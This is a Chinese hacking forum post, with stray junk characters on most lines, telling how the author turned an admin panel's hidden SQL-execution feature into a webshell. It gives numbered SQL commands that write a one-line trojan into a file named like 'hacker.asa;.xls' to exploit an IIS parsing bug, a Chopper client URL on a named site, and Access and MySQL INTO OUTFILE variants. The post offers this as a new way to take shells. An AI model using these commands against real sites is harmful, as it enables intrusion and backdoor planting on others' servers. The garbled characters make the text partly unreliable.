好不容易进了后台,发现啥上传啊。备份啊多木有。
7 H% o( u9 o( O8 _webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
7 ^! s+ T6 q. H: ~2 m* i( X1 N文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
! M# Z) T6 g b; \+ c+ I) c) ^然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:# `' l/ g+ r: V. \! T0 C" I
1.create table cmd (a varchar(50))
( D$ W( ]7 T5 m$ M2.insert into cmd (a) values (‘‘)% V' G6 f- h4 F1 t
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
6 K) m2 y% C I% G(把表cmd的内容导出为物理路径的一个EXCEL文件)0 T3 k |8 i x1 N; r. j6 B
4.drop table cmd
. M% }; l4 A1 F O! i: {利用IIS的BUG成功拿到了WEBSHELL。1 K$ d- |5 {4 h7 n* t
/ s& }- X3 v# _. L1 M0 c! J直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话 K+ [8 S0 T( a3 L2 y$ k
% k8 h0 `1 B9 \ }; Q
SQL语句意思解释:
: T4 i3 F, E2 O3 u 第一句7 `# C& F+ `; l; c' Y: P
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) b% Z3 T. \9 _3 T# h
7 N& v) W6 Q" h. \ 第二句0 z7 ^0 n& w, l; G/ g, [
在表cmd的a字段插入一句话木马
7 d7 u( s9 [7 m3 h) U1 } 第三句
7 Y; M* A/ C. u6 e( l1 u 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件5 J: F/ J2 S7 C7 p2 Y
1 m* P2 }1 p4 ` 第四句
7 Q* |$ b; q/ o2 |9 B P 删除建立的cmd表
8 Q/ m6 z6 [, N2 `4 a* K. N h; Y4 }) b
以下内容为测试:
* j% L! K) U K5 H7 {9 G Access利用后台SQL执行命令功能导出WebShell:" T$ f9 B1 s& z C" X9 C. B1 f' }: Z
这个更简单:
7 r/ f: d; Z l+ Y9 N [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
/ f& @3 S2 d4 C& p4 b( u0 Q5 K* I 或者
f) |3 h+ B* Q* j+ E [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
: [3 G" s% B, r) |* h; o
" ?" ^' J0 Y, n5 N* p 后台有执行SQL语句功能(vote为已知表段). W# g$ A [4 m7 W) s K4 }
希望对大家有所帮助拿shell的又一个思路( t9 A3 c8 a9 D- |! s
|